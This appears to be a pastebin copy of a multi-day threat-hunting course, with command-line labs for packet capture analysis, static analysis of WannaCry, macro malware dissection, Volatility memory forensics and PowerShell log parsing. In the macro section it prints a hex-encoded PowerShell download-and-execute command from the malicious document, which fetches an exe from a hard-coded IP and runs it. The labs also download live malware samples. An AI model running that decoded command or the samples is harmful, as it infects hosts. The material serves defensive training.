· 7 years ago · Oct 19, 2018, 01:06 PM
1 #####################################
2----------- ############### # Day 1: Threat Hunting on the wire ################ -----------
3 #####################################
4
5
6###################################
7# Setting up your virtual machine #
8# Note: run as root user #
9###################################
10
11
12Here is where we will setup all of the required dependencies for the tools we plan to install
13---------------------------Type This-----------------------------------
14apt update
15apt-get install -y libpcre3-dbg libpcre3-dev autoconf automake libtool libpcap-dev libnet1-dev libyaml-dev libjansson4 libcap-ng-dev libmagic-dev libjansson-dev zlib1g-dev libnetfilter-queue-dev libnetfilter-queue1 libnfnetlink-dev cmake make gcc g++ flex bison libpcap-dev libssl-dev unzip python-dev swig zlib1g-dev sendmail sendmail-bin prads tcpflow python-scapy python-yara tshark whois jq
16-----------------------------------------------------------------------
17
18
19
20
21Now we install Suricata
22---------------------------Type This-----------------------------------
23wget https://www.openinfosecfoundation.org/download/suricata-4.0.5.tar.gz
24
25tar -zxvf suricata-4.0.5.tar.gz
26
27cd suricata-4.0.5
28
29./configure --enable-nfqueue --prefix=/usr --sysconfdir=/etc --localstatedir=/var
30
31make
32
33make install
34
35make install-conf
36
37cd rules
38
39cp *.rules /etc/suricata/rules/
40
41cd /etc/suricata/
42
43wget https://rules.emergingthreats.net/open/suricata-4.0/emerging.rules.tar.gz
44
45tar -zxvf emerging.rules.tar.gz
46-----------------------------------------------------------------------
47
48
49
50
51
52##################################################################
53# Analyzing a PCAP Prads #
54# Note: run as regular user #
55##################################################################
56
57---------------------------Type This-----------------------------------
58cd ~
59
60mkdir pcap_analysis/
61
62cd ~/pcap_analysis/
63
64mkdir prads
65
66cd ~/pcap_analysis/prads
67
68wget https://s3.amazonaws.com/infosecaddictsfiles/suspicious-time.pcap
69
70prads -r suspicious-time.pcap -l prads-asset.log
71
72cat prads-asset.log | less
73
74cat prads-asset.log | grep SYN | grep -iE 'windows|linux'
75
76cat prads-asset.log | grep CLIENT | grep -iE 'safari|firefox|opera|chrome'
77
78cat prads-asset.log | grep SERVER | grep -iE 'apache|linux|ubuntu|nginx|iis'
79-----------------------------------------------------------------------
80
81
82
83
84##################################
85# PCAP Analysis with ChaosReader #
86# Note: run as regular user #
87##################################
88---------------------------Type This-----------------------------------
89cd ~
90
91mkdir -p pcap_analysis/chaos_reader/
92
93cd ~/pcap_analysis/chaos_reader/
94
95wget https://s3.amazonaws.com/infosecaddictsfiles/suspicious-time.pcap
96
97wget https://s3.amazonaws.com/infosecaddictsfiles/chaosreader.pl
98
99perl chaosreader.pl suspicious-time.pcap
100
101cat index.text | grep -v '"' | grep -oE "([0-9]+\.){3}[0-9]+.*\)"
102
103cat index.text | grep -v '"' | grep -oE "([0-9]+\.){3}[0-9]+.*\)" | awk '{print $4, $5, $6}' | sort | uniq -c | sort -nr
104
105
106for i in session_00[0-9]*.http.html; do srcip=`cat "$i" | grep 'http:\ ' | awk '{print $2}' | cut -d ':' -f1`; dstip=`cat "$i" | grep 'http:\ ' | awk '{print $4}' | cut -d ':' -f1`; host=`cat "$i" | grep 'Host:\ ' | sort -u | sed -e 's/Host:\ //g'`; echo "$srcip --> $dstip = $host"; done | sort -u
107
108python -m SimpleHTTPServer
109 ****** Open a web browser and browse the the IP address of your Linux machine port 8000 for the web page *****
110
111------------------------------------------------------------------------
112
113
114
115
116
117
118
119
120#############################
121# PCAP Analysis with tshark #
122# Note: run as regular user #
123#############################
124---------------------------Type This-----------------------------------
125cd ~/pcap_analysis/
126
127mkdir tshark
128
129cd ~/pcap_analysis/tshark
130
131wget https://s3.amazonaws.com/infosecaddictsfiles/suspicious-time.pcap
132
133tshark -i ens3 -r suspicious-time.pcap -qz io,phs
134
135tshark -r suspicious-time.pcap -qz ip_hosts,tree
136
137tshark -r suspicious-time.pcap -Y "http.request" -Tfields -e "ip.src" -e "http.user_agent" | uniq
138
139tshark -r suspicious-time.pcap -Y "dns" -T fields -e "ip.src" -e "dns.flags.response" -e "dns.qry.name"
140
141
142tshark -r suspicious-time.pcap -Y http.request -T fields -e ip.src -e ip.dst -e http.host -e http.request.uri | awk '{print $1," -> ",$2, "\t: ","http://"$3$4}'
143
144whois rapidshare.com.eyu32.ru
145
146whois sploitme.com.cn
147
148tshark -r suspicious-time.pcap -Y http.request -T fields -e ip.src -e ip.dst -e http.host -e http.request.uri | awk '{print $1," -> ",$2, "\t: ","http://"$3$4}' | grep -v -e '\/image' -e '.css' -e '.ico' -e google -e 'honeynet.org'
149
150tshark -r suspicious-time.pcap -qz http_req,tree
151
152tshark -r suspicious-time.pcap -Y "data-text-lines contains \"<script\"" -T fields -e frame.number -e ip.src -e ip.dst
153
154tshark -r suspicious-time.pcap -Y http.request -T fields -e ip.src -e ip.dst -e http.host -e http.request.uri | awk '{print $1," -> ",$2, "\t: ","http://"$3$4}' | grep -v -e '\/image' -e '.css' -e '.ico' | grep 10.0.3.15 | sed -e 's/\?[^cse].*/\?\.\.\./g'
155------------------------------------------------------------------------
156
157
158
159
160
161
162
163###############################
164# PCAP Analysis with Suricata #
165# Note: run as root #
166###############################
167---------------------------Type This-----------------------------------
168cd /home/joe/pcap_analysis/
169
170mkdir suricata
171
172cd suricata/
173
174wget https://s3.amazonaws.com/infosecaddictsfiles/suspicious-time.pcap
175
176mkdir suri
177
178suricata -c /etc/suricata/suricata.yaml -r suspicious-time.pcap -l suri/
179
180cd suri/
181
182cat stats.log | less
183
184cat eve.json |grep -E "e\":\"http"|jq ".timestamp,.http"|csplit - /..T..:/ {*}
185
186cat xx01
187
188cat xx02
189
190cat xx03
191
192cat xx04
193
194cat xx05
195
196cat xx06
197------------------------------------------------------------------------
198
199
200#############################
201# PCAP Analysis with Yara #
202# Note: run as regular user #
203#############################
204---------------------------Type This-----------------------------------
205cd ~/pcap_analysis/
206
207git clone https://github.com/kevthehermit/YaraPcap.git
208cd YaraPcap/
209wget https://s3.amazonaws.com/infosecaddictsfiles/suspicious-time.pcap
210wget https://github.com/Yara-Rules/rules/archive/master.zip
211unzip master.zip
212cd rules-master/
213ls
214cat index.yar
215clear
216./index_gen.sh
217cd ..
218mkdir matching_files/
219python yaraPcap.py rules-master/index.yar suspicious-time.pcap -s matching_files/
220whereis tcpflow
221vi yaraPcap.py **** fix line 35 with correct path to tcpflow ****:q!
222python yaraPcap.py rules-master/index.yar suspicious-time.pcap -s matching_files/
223cd matching_files/
224ls
225cat report.txt
226------------------------------------------------------------------------
227
228
229
230 ###############################################
231----------- ############### # Day 2: Threat Hunting with Static Analysis ################ -----------
232 ###############################################
233
234
235
236
237###################################
238# Setting up your virtual machine #
239###################################
240
241Here is where we will setup all of the required dependencies for the tools we plan to install
242---------------------------Type This-----------------------------------
243sudo apt update
244sudo apt-get install -y python3-pip python3-dev unzip python3-setuptools ipython3 build-essential python-pefile python2.7 python-pip python-setuptools mysql-server build-dep python-mysqldb python-mysqldb
245
246
247sudo pip install -U olefile
248
249
250git clone https://github.com/Te-k/pe.git
251cd pe
252sudo python3 setup.py install
253pip3 install .
254cd ..
255wget https://s3.amazonaws.com/infosecaddictsfiles/wannacry.zip
256 infected
257-----------------------------------------------------------------------
258
259
260
261
262################
263# The Scenario #
264################
265You've come across a file that has been flagged by one of your security products (AV Quarantine, HIPS, Spam Filter, Web Proxy, or digital forensics scripts).
266
267
268The fastest thing you can do is perform static analysis.
269
270
271
272###################
273# Static Analysis #
274###################
275
276- After logging please open a terminal window and type the following commands:
277
278
279---------------------------Type This-----------------------------------
280cd ~
281
282mkdir static_analysis
283
284cd static_analysis
285
286wget https://s3.amazonaws.com/infosecaddictsfiles/wannacry.zip
287
288unzip wannacry.zip
289 infected
290
291file wannacry.exe
292
293mv wannacry.exe malware.pdf
294
295file malware.pdf
296
297mv malware.pdf wannacry.exe
298
299hexdump -n 2 -C wannacry.exe
300
301----------------------------------------------------------------------
302
303
304***What is '4d 5a' or 'MZ'***
305Reference:
306http://www.garykessler.net/library/file_sigs.html
307
308
309
310
311---------------------------Type This-----------------------------------
312objdump -x wannacry.exe
313
314strings wannacry.exe
315
316strings wannacry.exe | grep -i dll
317
318strings wannacry.exe | grep -i library
319
320strings wannacry.exe | grep -i reg
321
322strings wannacry.exe | grep -i key
323
324strings wannacry.exe | grep -i rsa
325
326strings wannacry.exe | grep -i open
327
328strings wannacry.exe | grep -i get
329
330strings wannacry.exe | grep -i mutex
331
332strings wannacry.exe | grep -i irc
333
334strings wannacry.exe | grep -i join
335
336strings wannacry.exe | grep -i admin
337
338strings wannacry.exe | grep -i list
339----------------------------------------------------------------------
340
341
342
343
344
345---------------------------Type This-----------------------------------
346pe info wannacry.exe
347pe check wannacry.exe
348pe dump --section text wannacry.exe
349pe dump --section data wannacry.exe
350pe dump --section rsrc wannacry.exe
351pe dump --section reloc wannacry.exe
352strings rdata | less
353strings rsrc | less
354strings text | less
355----------------------------------------------------------------------
356
357
358
359
360
361
362
363
364Hmmmmm.......what's the latest thing in the news - oh yeah "WannaCry"
365
366Quick Google search for "wannacry ransomeware analysis"
367
368
369Reference
370https://securingtomorrow.mcafee.com/executive-perspectives/analysis-wannacry-ransomware-outbreak/
371
372- Yara Rule -
373
374
375Strings:
376$s1 = “Ooops, your files have been encrypted!†wide ascii nocase
377$s2 = “Wanna Decryptor†wide ascii nocase
378$s3 = “.wcry†wide ascii nocase
379$s4 = “WANNACRY†wide ascii nocase
380$s5 = “WANACRY!†wide ascii nocase
381$s7 = “icacls . /grant Everyone:F /T /C /Q†wide ascii nocase
382
383
384
385
386
387
388
389
390Ok, let's look for the individual strings
391
392
393---------------------------Type This-----------------------------------
394strings wannacry.exe | grep -i ooops
395
396strings wannacry.exe | grep -i wanna
397
398strings wannacry.exe | grep -i wcry
399
400strings wannacry.exe | grep -i wannacry
401
402strings wannacry.exe | grep -i wanacry **** Matches $s5, hmmm.....
403----------------------------------------------------------------------
404
405
406
407
408
409
410
411
412
413
414
415
416
417
418
419
420####################################
421# Tired of GREP - let's try Python #
422####################################
423Decided to make my own script for this kind of stuff in the future. I
424
425Reference1:
426https://s3.amazonaws.com/infosecaddictsfiles/analyse_malware.py
427
428This is a really good script for the basics of static analysis
429
430Reference:
431https://joesecurity.org/reports/report-db349b97c37d22f5ea1d1841e3c89eb4.html
432
433
434This is really good for showing some good signatures to add to the Python script
435
436
437Here is my own script using the signatures (started this yesterday, but still needs work):
438https://pastebin.com/guxzCBmP
439
440
441
442---------------------------Type This-----------------------------------
443wget https://pastebin.com/raw/guxzCBmP
444
445
446mv guxzCBmP am.py
447
448
449vi am.py
450
451python2.7 am.py wannacry.exe
452----------------------------------------------------------------------
453
454
455
456##############
457# Yara Ninja #
458##############
459
460Reference:
461https://securingtomorrow.mcafee.com/executive-perspectives/analysis-wannacry-ransomware-outbreak/
462
463----------------------------------------------------------------------------
464rule wannacry_1 : ransom
465{
466 meta:
467 author = "Joshua Cannell"
468 description = "WannaCry Ransomware strings"
469 weight = 100
470 date = "2017-05-12"
471
472 strings:
473 $s1 = "Ooops, your files have been encrypted!" wide ascii nocase
474 $s2 = "Wanna Decryptor" wide ascii nocase
475 $s3 = ".wcry" wide ascii nocase
476 $s4 = "WANNACRY" wide ascii nocase
477 $s5 = "WANACRY!" wide ascii nocase
478 $s7 = "icacls . /grant Everyone:F /T /C /Q" wide ascii nocase
479
480 condition:
481 any of them
482}
483
484----------------------------------------------------------------------------
485rule wannacry_2{
486 meta:
487 author = "Harold Ogden"
488 description = "WannaCry Ransomware Strings"
489 date = "2017-05-12"
490 weight = 100
491
492 strings:
493 $string1 = "msg/m_bulgarian.wnry"
494 $string2 = "msg/m_chinese (simplified).wnry"
495 $string3 = "msg/m_chinese (traditional).wnry"
496 $string4 = "msg/m_croatian.wnry"
497 $string5 = "msg/m_czech.wnry"
498 $string6 = "msg/m_danish.wnry"
499 $string7 = "msg/m_dutch.wnry"
500 $string8 = "msg/m_english.wnry"
501 $string9 = "msg/m_filipino.wnry"
502 $string10 = "msg/m_finnish.wnry"
503 $string11 = "msg/m_french.wnry"
504 $string12 = "msg/m_german.wnry"
505 $string13 = "msg/m_greek.wnry"
506 $string14 = "msg/m_indonesian.wnry"
507 $string15 = "msg/m_italian.wnry"
508 $string16 = "msg/m_japanese.wnry"
509 $string17 = "msg/m_korean.wnry"
510 $string18 = "msg/m_latvian.wnry"
511 $string19 = "msg/m_norwegian.wnry"
512 $string20 = "msg/m_polish.wnry"
513 $string21 = "msg/m_portuguese.wnry"
514 $string22 = "msg/m_romanian.wnry"
515 $string23 = "msg/m_russian.wnry"
516 $string24 = "msg/m_slovak.wnry"
517 $string25 = "msg/m_spanish.wnry"
518 $string26 = "msg/m_swedish.wnry"
519 $string27 = "msg/m_turkish.wnry"
520 $string28 = "msg/m_vietnamese.wnry"
521
522
523 condition:
524 any of ($string*)
525}
526----------------------------------------------------------------------------
527
528
529
530
531
532
533
534#####################################################
535# Analyzing Macro Embedded Malware #
536#####################################################
537---------------------------Type This-----------------------------------
538mkdir ~/oledump
539
540cd ~/oledump
541
542wget http://didierstevens.com/files/software/oledump_V0_0_22.zip
543
544unzip oledump_V0_0_22.zip
545
546wget https://s3.amazonaws.com/infosecaddictsfiles/064016.zip
547
548unzip 064016.zip
549 infected
550
551python oledump.py 064016.doc
552
553python oledump.py 064016.doc -s A4 -v
554 -----------------------------------------------------------------------
555
556
557
558- From this we can see this Word doc contains an embedded file called editdata.mso which contains seven data streams.
559- Three of the data streams are flagged as macros: A3:’VBA/Module1′, A4:’VBA/Module2′, A5:’VBA/ThisDocument’.
560
561---------------------------Type This-----------------------------------
562python oledump.py 064016.doc -s A5 -v
563-----------------------------------------------------------------------
564
565- As far as I can tell, VBA/Module2 does absolutely nothing. These are nonsensical functions designed to confuse heuristic scanners.
566
567---------------------------Type This-----------------------------------
568python oledump.py 064016.doc -s A3 -v
569
570- Look for "GVhkjbjv" and you should see:
571
572636D64202F4B20706F7765727368656C6C2E657865202D457865637574696F6E506F6C69637920627970617373202D6E6F70726F66696C6520284E65772D4F626A6563742053797374656D2E4E65742E576562436C69656E74292E446F776E6C6F616446696C652827687474703A2F2F36322E37362E34312E31352F6173616C742F617373612E657865272C272554454D50255C4A494F696F646668696F49482E63616227293B20657870616E64202554454D50255C4A494F696F646668696F49482E636162202554454D50255C4A494F696F646668696F49482E6578653B207374617274202554454D50255C4A494F696F646668696F49482E6578653B
573
574- Take that long blob that starts with 636D and finishes with 653B and paste it in:
575http://www.rapidtables.com/convert/number/hex-to-ascii.htm
576-----------------------------------------------------------------------
577
578
579
580###############################
581# Creating a Malware Database #
582###############################
583Creating a malware database (mysql)
584-----------------------------------
585- Step 1: Logging in
586Run the following command in the terminal:
587---------------------------Type This-----------------------------------
588mysql -u root -p (set a password of 'malware')
589
590- Then create one database by running following command:
591
592create database malware;
593
594exit;
595
596wget https://raw.githubusercontent.com/dcmorton/MalwareTools/master/mal_to_db.py
597
598vi mal_to_db.py (fill in database connection information)
599
600python mal_to_db.py -i
601
602------- check it to see if the files table was created ------
603
604mysql -u root -p
605 malware
606
607show databases;
608
609use malware;
610
611show tables;
612
613describe files;
614
615exit;
616
617---------------------------------
618
619
620- Now add the malicious file to the DB
621---------------------------Type This-----------------------------------
622python mal_to_db.py -f wannacry.exe -u
623
624
625
626- Now check to see if it is in the DB
627---------------------------Type This-----------------------------------
628mysql -u root -p
629 malware
630
631mysql> use malware;
632
633select id,md5,sha1,sha256,time FROM files;
634
635mysql> quit;
636-----------------------------------------------------------------------
637
638
639
640
641 ###############################################
642----------- ############### # Day 3: Threat hunting with memory analysis ################ -----------
643 ###############################################
644
645
646
647
648
649###################################
650# Setting up your virtual machine #
651###################################
652
653Here is where we will setup all of the required dependencies for the tools we plan to install
654---------------------------Type This-----------------------------------
655apt update
656apt-get install -y foremost tcpxtract python-openpyxl python-ujson python-ujson-dbg python-pycryptopp python-pycryptopp-dbg libdistorm3-3 libdistorm3-dev python-distorm3 volatility volatility-tools
657-----------------------------------------------------------------------
658
659
660
661
662################
663# The Scenario #
664################
665
666
667###################
668# Memory Analysis #
669###################
670---------------------------Type This-----------------------------------
671cd ~/
672
673mkdir mem_analysis
674
675cd mem_analysis
676
677wget https://s3.amazonaws.com/infosecaddictsfiles/hn_forensics.vmem
678
679volatility pslist -f hn_forensics.vmem
680volatility pslist -f hn_forensics.vmem | awk '{print $2,$3,$4}'
681volatility pslist -f hn_forensics.vmem | awk '{print $2,"\t\t"$3"\t\t","\t\t"$4}'
682volatility connscan -f hn_forensics.vmem
683volatility connscan -f hn_forensics.vmem | grep -E '888|1752'
684
685mkdir malfind/
686mkdir dump/
687mkdir -p output/pdf/
688
689volatility privs -f hn_forensics.vmem
690volatility svcscan -f hn_forensics.vmem
691volatility malfind -f hn_forensics.vmem --dump-dir malfind/
692
693
694volatility -f hn_forensics.vmem memdump -p 888 --dump-dir dump/
695volatility -f hn_forensics.vmem memdump -p 1752 --dump-dir dump/
696
697 ***Takes a few min***
698
699cd dump/
700strings 1752.dmp | grep "^http://" | sort | uniq
701strings 1752.dmp | grep "Ahttps://" | uniq -u
702
703foremost -i 1752.dmp -t pdf -o ../output/pdf/
704cd ../output/pdf/
705cat audit.txt
706cd pdf
707ls
708grep -i javascript *.pdf
709
710
711wget http://didierstevens.com/files/software/pdf-parser_V0_6_4.zip
712unzip pdf-parser_V0_6_4.zip
713python pdf-parser.py -s javascript --raw 00601560.pdf
714python pdf-parser.py --object 11 00601560.pdf
715python pdf-parser.py --object 1054 --raw --filter 00601560.pdf > malicious.js
716
717cat malicious.js
718 -----------------------------------------------------------------------
719
720
721
722 ############################################
723----------- ############### # Day 4: Threat Hunting with log analysis ################ -----------
724 ############################################
725
726#####################
727# Powershell Basics #
728#####################
729
730PowerShell is Microsoft's new scripting language that has been built in since the release Vista.
731
732PowerShell file extension end in .ps1 .
733
734An important note is that you cannot double click on a PowerShell script to execute it.
735
736To open a PowerShell command prompt either hit Windows Key + R and type in PowerShell or Start -> All Programs -> Accessories -> Windows PowerShell -> Windows PowerShell.
737
738------------------------Type This------------------------------
739cd c:\
740dir
741cd
742ls
743---------------------------------------------------------------
744
745
746To obtain a list of cmdlets, use the Get-Command cmdlet
747------------------------Type This------------------------------
748Get-Command
749---------------------------------------------------------------
750
751
752You can use the Get-Alias cmdlet to see a full list of aliased commands.
753------------------------Type This------------------------------
754Get-Alias
755---------------------------------------------------------------
756
757
758Don't worry you won't blow up your machine with Powershell
759------------------------Type This------------------------------
760Get-Process | stop-process Don't press [ ENTER ] What will this command do?
761Get-Process | stop-process -whatif
762---------------------------------------------------------------
763
764To get help with a cmdlet, use the Get-Help cmdlet along with the cmdlet you want information about.
765------------------------Type This------------------------------
766Get-Help Get-Command
767
768Get-Help Get-Service –online
769
770Get-Service -Name TermService, Spooler
771
772Get-Service –N BITS
773---------------------------------------------------------------
774
775
776
777
778
779- Run cmdlet through a pie and refer to its properties as $_
780------------------------Type This------------------------------
781Get-Service | where-object { $_.Status -eq "Running"}
782---------------------------------------------------------------
783
784
785
786- PowerShell variables begin with the $ symbol. First lets create a variable
787------------------------Type This------------------------------
788$serv = Get-Service –N Spooler
789---------------------------------------------------------------
790
791To see the value of a variable you can just call it in the terminal.
792------------------------Type This------------------------------
793$serv
794
795$serv.gettype().fullname
796---------------------------------------------------------------
797
798
799Get-Member is another extremely useful cmdlet that will enumerate the available methods and properties of an object. You can pipe the object to Get-Member or pass it in
800------------------------Type This------------------------------
801$serv | Get-Member
802
803Get-Member -InputObject $serv
804---------------------------------------------------------------
805
806
807
808
809Let's use a method and a property with our object.
810------------------------Type This------------------------------
811$serv.Status
812$serv.Stop()
813$serv.Refresh()
814$serv.Status
815$serv.Start()
816$serv.Refresh()
817$serv.Status
818---------------------------------------------------------------
819
820
821If you want some good command-line shortcuts you can check out the following link:
822https://technet.microsoft.com/en-us/library/ff678293.aspx
823
824#############################
825# Simple Event Log Analysis #
826#############################
827
828Step 1: Dump the event logs
829---------------------------
830The first thing to do is to dump them into a format that facilitates later processing with Windows PowerShell.
831
832To dump the event log, you can use the Get-EventLog and the Exportto-Clixml cmdlets if you are working with a traditional event log such as the Security, Application, or System event logs.
833If you need to work with one of the trace logs, use the Get-WinEvent and the ExportTo-Clixml cmdlets.
834------------------------Type This------------------------------
835Get-EventLog -LogName application | Export-Clixml Applog.xml
836
837type .\Applog.xml
838
839$logs = "system","application","security"
840---------------------------------------------------------------
841
842
843The % symbol is an alias for the Foreach-Object cmdlet. It is often used when working interactively from the Windows PowerShell console
844------------------------Type This------------------------------
845$logs | % { get-eventlog -LogName $_ | Export-Clixml "$_.xml" }
846---------------------------------------------------------------
847
848
849
850
851Step 2: Import the event log of interest
852----------------------------------------
853To parse the event logs, use the Import-Clixml cmdlet to read the stored XML files.
854Store the results in a variable.
855Let's take a look at the commandlets Where-Object, Group-Object, and Select-Object.
856
857The following two commands first read the exported security log contents into a variable named $seclog, and then the five oldest entries are obtained.
858------------------------Type This------------------------------
859$seclog = Import-Clixml security.xml
860
861$seclog | select -Last 5
862---------------------------------------------------------------
863
864Cool trick from one of our students named Adam. This command allows you to look at the logs for the last 24 hours:
865------------------------Type This------------------------------
866Get-EventLog Application -After (Get-Date).AddDays(-1)
867---------------------------------------------------------------
868You can use '-after' and '-before' to filter date ranges
869
870One thing you must keep in mind is that once you export the security log to XML, it is no longer protected by anything more than the NFTS and share permissions that are assigned to the location where you store everything.
871By default, an ordinary user does not have permission to read the security log.
872
873
874
875
876Step 3: Drill into a specific entry
877-----------------------------------
878To view the entire contents of a specific event log entry, choose that entry, send the results to the Format-List cmdlet, and choose all of the properties.
879
880------------------------Type This------------------------------
881$seclog | select -first 1 | fl *
882---------------------------------------------------------------
883
884The message property contains the SID, account name, user domain, and privileges that are assigned for the new login.
885
886------------------------Type This------------------------------
887($seclog | select -first 1).message
888
889(($seclog | select -first 1).message).gettype()
890---------------------------------------------------------------
891
892
893In the *nix world you often want a count of something (wc -l).
894How often is the SeSecurityPrivilege privilege mentioned in the message property?
895To obtain this information, pipe the contents of the security log to a Where-Object to filter the events, and then send the results to the Measure-Object cmdlet to determine the number of events:
896------------------------Type This------------------------------
897$seclog | ? { $_.message -match 'SeSecurityPrivilege'} | measure
898---------------------------------------------------------------
899If you want to ensure that only event log entries return that contain SeSecurityPrivilege in their text, use Group-Object to gather the matches by the EventID property.
900
901------------------------Type This------------------------------
902$seclog | ? { $_.message -match 'SeSecurityPrivilege'} | group eventid
903---------------------------------------------------------------
904
905Because importing the event log into a variable from the stored XML results in a collection of event log entries, it means that the count property is also present.
906Use the count property to determine the total number of entries in the event log.
907------------------------Type This------------------------------
908$seclog.Count
909---------------------------------------------------------------
910
911
912
913
914
915############################
916# Simple Log File Analysis #
917############################
918
919
920You'll need to create the directory c:\ps and download sample iss log http://pastebin.com/raw.php?i=LBn64cyA
921
922------------------------Type This------------------------------
923mkdir c:\ps
924cd c:\ps
925(new-object System.Net.WebClient).DownloadFile("http://pastebin.com/raw.php?i=LBn64cyA", "c:\ps\u_ex1104.log")
926(new-object System.Net.WebClient).DownloadFile("http://pastebin.com/raw.php?i=ysnhXxTV", "c:\ps\CiscoLogFileExamples.txt")
927Select-String 192.168.208.63 .\CiscoLogFileExamples.txt
928---------------------------------------------------------------
929
930
931
932The Select-String cmdlet searches for text and text patterns in input strings and files. You can use it like Grep in UNIX and Findstr in Windows.
933------------------------Type This------------------------------
934Select-String 192.168.208.63 .\CiscoLogFileExamples.txt | select line
935---------------------------------------------------------------
936
937
938
939To see how many connections are made when analyzing a single host, the output from that can be piped to another command: Measure-Object.
940------------------------Type This------------------------------
941Select-String 192.168.208.63 .\CiscoLogFileExamples.txt | select line | Measure-Object
942---------------------------------------------------------------
943
944
945To select all IP addresses in the file expand the matches property, select the value, get unique values and measure the output.
946------------------------Type This------------------------------
947Select-String "\b(?:\d{1,3}\.){3}\d{1,3}\b" .\CiscoLogFileExamples.txt | select -ExpandProperty matches | select -ExpandProperty value | Sort-Object -Unique | Measure-Object
948---------------------------------------------------------------
949
950
951Removing Measure-Object shows all the individual IPs instead of just the count of the IP addresses. The Measure-Object command counts the IP addresses.
952------------------------Type This------------------------------
953Select-String "\b(?:\d{1,3}\.){3}\d{1,3}\b" .\CiscoLogFileExamples.txt | select -ExpandProperty matches | select -ExpandProperty value | Sort-Object -Unique
954---------------------------------------------------------------
955
956In order to determine which IP addresses have the most communication the last commands are removed to determine the value of the matches. Then the group command is issued on the piped output to group all the IP addresses (value), and then sort the objects by using the alias for Sort-Object: sort count –des.
957This sorts the IP addresses in a descending pattern as well as count and deliver the output to the shell.
958------------------------Type This------------------------------
959Select-String "\b(?:\d{1,3}\.){3}\d{1,3}\b" .\CiscoLogFileExamples.txt | select -ExpandProperty matches | select value | group value | sort count -des
960---------------------------------------------------------------
961
962
963
964##############################################
965# Parsing Log files using windows PowerShell #
966##############################################
967
968Download the sample IIS log http://pastebin.com/LBn64cyA
969
970------------------------Type This------------------------------
971(new-object System.Net.WebClient).DownloadFile("http://pastebin.com/raw.php?i=LBn64cyA", "c:\ps\u_ex1104.log")
972
973Get-Content ".\*log" | ? { ($_ | Select-String "WebDAV")}
974---------------------------------------------------------------
975
976
977The above command would give us all the WebDAV requests.
978
979To filter this to a particular user name, use the below command:
980------------------------Type This------------------------------
981Get-Content ".\*log" | ? { ($_ | Select-String "WebDAV") -and ($_ | Select-String "OPTIONS")}
982---------------------------------------------------------------
983
984
985Some more options that will be more commonly required :
986
987For Outlook Web Access : Replace WebDAV with OWA
988
989For EAS : Replace WebDAV with Microsoft-server-activesync
990
991For ECP : Replace WebDAV with ECP
992
993
994
995
996
997
998
999####################################################################
1000# Windows PowerShell: Extracting Strings Using Regular Expressions #
1001####################################################################
1002
1003
1004Regex Characters you might run into:
1005
1006^ Start of string, or start of line in a multiline pattern
1007$ End of string, or start of line in a multiline pattern
1008\b Word boundary
1009\d Digit
1010\ Escape the following character
1011* 0 or more {3} Exactly 3
1012+ 1 or more {3,} 3 or more
1013? 0 or 1 {3,5} 3, 4 or 5
1014
1015
1016
1017To build a script that will extract data from a text file and place the extracted text into another file, we need three main elements:
1018
10191) The input file that will be parsed
1020------------------------Type This------------------------------
1021(new-object System.Net.WebClient).DownloadFile("http://pastebin.com/raw.php?i=rDN3CMLc", "c:\ps\emails.txt")
1022(new-object System.Net.WebClient).DownloadFile("http://pastebin.com/raw.php?i=XySD8Mi2", "c:\ps\ip_addresses.txt")
1023(new-object System.Net.WebClient).DownloadFile("http://pastebin.com/raw.php?i=v5Yq66sH", "c:\ps\URL_addresses.txt")
1024---------------------------------------------------------------
10252) The regular expression that the input file will be compared against
1026
10273) The output file for where the extracted data will be placed.
1028
1029Windows PowerShell has a "select-string" cmdlet which can be used to quickly scan a file to see if a certain string value exists.
1030Using some of the parameters of this cmdlet, we are able to search through a file to see whether any strings match a certain pattern, and then output the results to a separate file.
1031
1032To demonstrate this concept, below is a Windows PowerShell script I created to search through a text file for strings that match the Regular Expression (or RegEx for short) pattern belonging to e-mail addresses.
1033------------------------Type This------------------------------
1034$input_path = 'c:\ps\emails.txt'
1035$output_file = 'c:\ps\extracted_addresses.txt'
1036$regex = '\b[A-Za-z0-9._%-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,4}\b'
1037select-string -Path $input_path -Pattern $regex -AllMatches | % { $_.Matches } | % { $_.Value } > $output_file
1038---------------------------------------------------------------
1039
1040
1041In this script, we have the following variables:
1042
10431) $input_path to hold the path to the input file we want to parse
1044
10452) $output_file to hold the path to the file we want the results to be stored in
1046
10473) $regex to hold the regular expression pattern to be used when the strings are being matched.
1048
1049The select-string cmdlet contains various parameters as follows:
1050
10511) "-Path" which takes as input the full path to the input file
1052
10532) "-Pattern" which takes as input the regular expression used in the matching process
1054
10553) "-AllMatches" which searches for more than one match (without this parameter it would stop after the first match is found) and is piped to "$.Matches" and then "$_.Value" which represent using the current values of all the matches.
1056
1057Using ">" the results are written to the destination specified in the $output_file variable.
1058
1059Here are two further examples of this script which incorporate a regular expression for extracting IP addresses and URLs.
1060
1061IP addresses
1062------------
1063For the purposes of this example, I ran the tracert command to trace the route from my host to google.com and saved the results into a file called ip_addresses.txt. You may choose to use this script for extracting IP addresses from router logs, firewall logs, debug logs, etc.
1064------------------------Type This------------------------------
1065$input_path = 'c:\ps\ip_addresses.txt'
1066$output_file = 'c:\ps\extracted_ip_addresses.txt'
1067$regex = '\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\b'
1068select-string -Path $input_path -Pattern $regex -AllMatches | % { $_.Matches } | % { $_.Value } > $output_file
1069---------------------------------------------------------------
1070
1071
1072
1073URLs
1074----
1075For the purposes of this example, I created a couple of dummy web server log entries and saved them into URL_addresses.txt.
1076You may choose to use this script for extracting URL addresses from proxy logs, network packet capture logs, debug logs, etc.
1077------------------------Type This------------------------------
1078$input_path = 'c:\ps\URL_addresses.txt'
1079$output_file = 'c:\ps\extracted_URL_addresses.txt'
1080$regex = '([a-zA-Z]{3,})://([\w-]+\.)+[\w-]+(/[\w- ./?%&=]*)*?'
1081select-string -Path $input_path -Pattern $regex -AllMatches | % { $_.Matches } | % { $_.Value } > $output_file
1082---------------------------------------------------------------
1083
1084In addition to the examples above, many other types of strings can be extracted using this script.
1085All you need to do is switch the regular expression in the "$regex" variable!
1086In fact, the beauty of such a PowerShell script is its simplicity and speed of execution.
1087
1088
1089
1090 ######################################
1091----------- ############### # Day 5: Wrapping up threat hunting ################ -----------
1092 #####################################
1093
1094##############################################
1095# Log Analysis with Linux command-line tools #
1096##############################################
1097The following command line executables are found in the Mac as well as most Linux Distributions.
1098
1099cat – prints the content of a file in the terminal window
1100grep – searches and filters based on patterns
1101awk – can sort each row into fields and display only what is needed
1102sed – performs find and replace functions
1103sort – arranges output in an order
1104uniq – compares adjacent lines and can report, filter or provide a count of duplicates
1105
